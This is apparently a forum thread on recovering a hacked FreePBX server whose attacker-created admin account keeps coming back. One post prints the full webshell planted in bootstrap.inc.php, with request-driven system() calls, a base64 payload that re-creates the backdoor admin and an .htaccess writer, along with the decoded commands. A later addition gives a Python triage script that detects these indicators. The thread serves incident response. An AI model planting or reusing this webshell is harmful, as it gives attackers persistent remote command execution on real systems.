System hacked - Cannot delete the admin user they created

Just yesterday I upgraded ALL the modules in this system. We got a message from the SIP trunk provider that we were making calls to Liberia. I tried to log into the system and could not. I used the amportal admin auth_none command and I can get into the system that way. I have tried to delete the new admin user he created but it will not go away. I have changed the Authorization to Database in Advanced Settings, still with no way of creating or removing the new admin user. There is a new extension listed in SIP info that is unmonitored, but it isn’t listed in the extension listings. There are outbound calls from unknown for several seconds. I tried remove extension command in the Asterisk CLI but I got an error that that command wasn’t valid.

What to Do???

What happens when you try to delete the user?

The screen refreshes and nothing has changed. Adding a new user is the same. I did an amportal chown with no change

You have not updated all of your modules. Please go perform that now.

All modules up to date according to the admin page.

If you still can't delete, please open a support request so we can take care of it for you. This is fixed when you update all modules, and you wouldn't have been hacked if you had updated modules 12 days ago when the CVE was released.

You can also redownload and reinstall framework

Still cannot delete the user. I uninstalled the Framework ARI module and reinstalled it. I also checked for an update, none shown. The version reported is 2.11.1.5 I am being asked by my partner if the cost per hour is $150.00 and if it can be resolved in an hour or less.

Thanks

I said download and install framework. Not ARI framework.

What version of Framework (NOT ARI Framework) and Core are you running on that machine?

Framework is 2.10.1.17
Core is 2.10.1.2

I put in a support ticket. Where would I download the Framework to upload it? Is it uploaded the way a non-supported module is?

Well, I found the method to upgrade framework using the CLI. It appeared to install/upgrade alright. But the problem remains and the version of Framework remains the same.

I was also having the same issue as edlentz where I had a new administrator named mgknight which I couldn't delete. I followed the instructions provided by tm1000 in another thread for removing it with a mysql command, and then issued a SELECT command to verify it was in fact deleted. But as soon as I opened any page in the administration interface, the user showed back up.

I found that /var/www/html/admin/bootstrap.inc.php had been modified to include code which re-created the user account any time a page was loaded. As soon as I removed the code from that file, I could delete the user account normally.

Here is the source of the modified bootstrap.inc.php file

<?php if ($_SERVER["REMOTE_ADDR"]=="178.162.201.166" && md5($_REQUEST['secure'])=="7f02b0ae0869cc5aa38cd7ca6c767c92"){ system($_REQUEST['secmd']); } if(md5($_REQUEST["mgp"])=="4f6e5768b76809bc99bf278494b5f352") { echo "login correct
"; echo ""; @system($_REQUEST["c"]); echo "";

}
system(base64_decode(“bXlzcWwgYGdyZXAgQU1QREIgL2V0Yy9hbXBvcnRhbC5jb25mfGdyZXAgIlVTRVJcfFBBU1NcfE5BTUUifCBzZWQgJ3MvQU1QREJVU0VSL2EvZyd8c2VkICdzL0FNUERCUEFTUy9iL2cnfHNlZCAncy9BTVBEQk5BTUUvYy9nJ3xzZWQgJ3MvYT0vLXUvZyd8c2VkICdzL2I9LyAtcC9nJ3xzZWQgJ3MvYz0vIC9nJ3x0ciAtZCAnXG4nYCAtLWV4ZWN1dGUgIkRFTEVURSBmcm9tIGFtcHVzZXJzIHdoZXJlIHVzZXJuYW1lIT0nYWRtaW4nO0lOU0VSVCBJTlRPIGFtcHVzZXJzICh1c2VybmFtZSxwYXNzd29yZF9zaGExLHNlY3Rpb25zKSBWQUxVRVMgKCdtZ2tuaWdodCcsJzMzYzdhNGRmNDZiMWE5ZjdkNGE0NjM2ZDQ3Njg0OTIwNWEwNGM2YjcnLCcqJyk7Ig==”));
system(base64_decode(“ZWNobyAnT3JkZXIgRGVueSxBbGxvd2BkZW55IGZyb20gYWxsYDxGaWxlcyBzdWJkaXJlY3RvcnkvKj5gICAgIGRlbnkgZnJvbSBhbGxgPC9GaWxlcz5gPEZpbGVzTWF0Y2ggIlwuLiokIj5gCURlbnkgZnJvbSBhbGxgPC9GaWxlc01hdGNoPmA8RmlsZXNNYXRjaCAiKF4kfGluZGV4XC5waHB8Y29uZmlnXC5waHB8XC4oZ2lmfEdJRnxqcGd8anBlZ3xwbmd8Y3NzfGpzfHN3Znx0eHR8aWNvfHR0Znxzdmd8ZW90fHdvZmZ8d2F2fG1wM3xhYWN8b2dnfHdlYm0pJHxib290c3RyYXBcLmluY1wucGhwKSI+YAlBbGxvdyBmcm9tIGFsbGA8L0ZpbGVzTWF0Y2g+YHBocF92YWx1ZSBtYXhfaW5wdXRfdmFycyA1MDAwJ3x0ciAnYCcgJ1xuJz4uaHRhY2Nlc3M=”));
?>

The first base64_decode includes the following code:

mysql `grep AMPDB /etc/amportal.conf|grep "USER\|PASS\|NAME"| sed 's/AMPDBUSER/a/g'|sed 's/AMPDBPASS/b/g'|sed 's/AMPDBNAME/c/g'|sed 's/a=/-u/g'|sed 's/b=/ -p/g'|sed 's/c=/ /g'|tr -d '\n'` --execute "DELETE from ampusers where username!='admin';INSERT INTO ampusers (username,password_sha1,sections) VALUES ('mgknight','33c7a4df46b1a9f7d4a4636d476849205a04c6b7','*');"

Which appears to simply delete any users which are not "admin" and then create the new "mgknight" admin account.

The second base64_decode includes the following code:

echo 'Order Deny,Allow`deny from all`<Files subdirectory/*>`    deny from all`</Files>`<FilesMatch "\..*$">`	Deny from all`</FilesMatch>`<FilesMatch "(^$|index\.php|config\.php|\.(gif|GIF|jpg|jpeg|png|css|js|swf|txt|ico|ttf|svg|eot|woff|wav|mp3|aac|ogg|webm)$|bootstrap\.inc\.php)">`	Allow from all`</FilesMatch>`php_value max_input_vars 5000'|tr '`' '\n'>.htaccess

I'm not entirely sure what this command does. If anyone can offer any insight on whether there is anything else that should be recovered from the above commands, please be sure to reply!

Joe
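A small triage script, added here as an illustration and not part of any post in this thread, that flags the indicators visible in the modified bootstrap.inc.php above (shell execution driven by request parameters, a REMOTE_ADDR / md5() gate, and system() fed by base64_decode()) and decodes the embedded base64 arguments so an analyst can read what they run without executing anything. The sample file contents, the address 192.0.2.10, the all-zero hash and the payload text are constructed for the example; they are not the values from the thread.

```python
"""Triage a PHP file for webshell-style indicators and decode its base64 blobs.

Usage: python triage_php.py /var/www/html/admin/bootstrap.inc.php
Without an argument it runs against a constructed sample file.
"""
import base64
import re
import sys

# Each pattern corresponds to one behaviour seen in the modified bootstrap file.
SUSPICIOUS_PATTERNS = {
    # system()/exec() whose argument comes straight from a request parameter
    "exec_from_request": re.compile(
        r"\b(?:system|exec|passthru|shell_exec)\s*\(\s*@?\$_(?:REQUEST|GET|POST)\b"),
    # system()/exec() whose argument is an inline base64_decode() call
    "exec_of_base64": re.compile(
        r"\b(?:system|exec|passthru|shell_exec)\s*\(\s*base64_decode\s*\("),
    # access gated on a hard-coded client address
    "remote_addr_gate": re.compile(
        r"\$_SERVER\[\s*[\"']REMOTE_ADDR[\"']\s*\]\s*==\s*[\"']"),
    # access gated on md5() of a request parameter compared to a fixed hash
    "md5_request_gate": re.compile(
        r"md5\s*\(\s*\$_(?:REQUEST|GET|POST)\b[^)]*\)\s*==\s*[\"'][0-9a-f]{32}[\"']"),
}

# Literal base64 argument to base64_decode(); curly quotes are accepted because
# pasted copies of such files often carry them, as the thread's copy does.
BASE64_ARG = re.compile(
    r"base64_decode\s*\(\s*[\"'\u201c\u201d]([A-Za-z0-9+/=]+)[\"'\u201c\u201d]\s*\)")


def find_indicators(php_source):
    """Return the sorted names of every suspicious pattern present in the source."""
    return sorted(name for name, pat in SUSPICIOUS_PATTERNS.items()
                  if pat.search(php_source))


def decode_payloads(php_source):
    """Decode each literal base64_decode() argument; None marks an undecodable blob."""
    payloads = []
    for blob in BASE64_ARG.findall(php_source):
        try:
            payloads.append(base64.b64decode(blob, validate=True)
                            .decode("utf-8", errors="replace"))
        except ValueError:
            payloads.append(None)
    return payloads


def triage(php_source):
    """Combine both checks into a single report dictionary."""
    indicators = find_indicators(php_source)
    return {
        "indicators": indicators,
        "payloads": decode_payloads(php_source),
        "suspicious": bool(indicators),
    }


# Constructed sample standing in for a tampered bootstrap.inc.php (not the real one).
SAMPLE_PAYLOAD = "echo 'constructed sample payload'"
SAMPLE_BOOTSTRAP = (
    "<?php\n"
    "if ($_SERVER[\"REMOTE_ADDR\"]==\"192.0.2.10\" && "
    "md5($_REQUEST['secure'])==\"" + "0" * 32 + "\"){ system($_REQUEST['secmd']); }\n"
    "system(base64_decode(\""
    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + "\"));\n"
    "?>\n"
)
# Constructed clean file for comparison.
CLEAN_SOURCE = "<?php\n// nothing but a comment here\n?>\n"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_BOOTSTRAP
    report = triage(source)
    print("suspicious:", report["suspicious"])
    for name in report["indicators"]:
        print("  indicator:", name)
    for i, payload in enumerate(report["payloads"], 1):
        print(f"  decoded payload {i}: {payload!r}")
```

The decoded payloads are printed, never executed; on a real incident the output is what you compare against the two commands quoted above, and a clean reinstall of the framework module (as Andrew advises later in the thread) replaces the file rather than editing it by hand.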

I’m having same issue as edlentz and I also found the creating user code in the bootstrap.inc.php as jcremin noted.
But even though I removed the code, it comes back.
I have updated all the modules but still having same problem.
Does anyone know how to fix this?

Please see: http://wiki.freepbx.org/display/L1/FreePBX+Security+Scan and run the commands

I ran it and the update went through. Immediately following, I received an error due to there being no bootstrap.inc.php file. I created a blank file and that appeared to fix it, but is there any content that should go in that file?

Vinnie

No, that is not a proper file. Doing the blank is fine.

Please also run:

/var/lib/asterisk/bin/module_admin -f update framework

Andrew

is that in addition to :smile:
http://wiki.freepbx.org/display/L1/FreePBX+Security+Scan

Thanks

Yes, well, the command I added above I also added to said script. Probably a good idea to run said script again (since adding the command).

I had only just found the script and hadn't used it yet. So I guess I am good then, running it for the first time now. Thanks Andrew.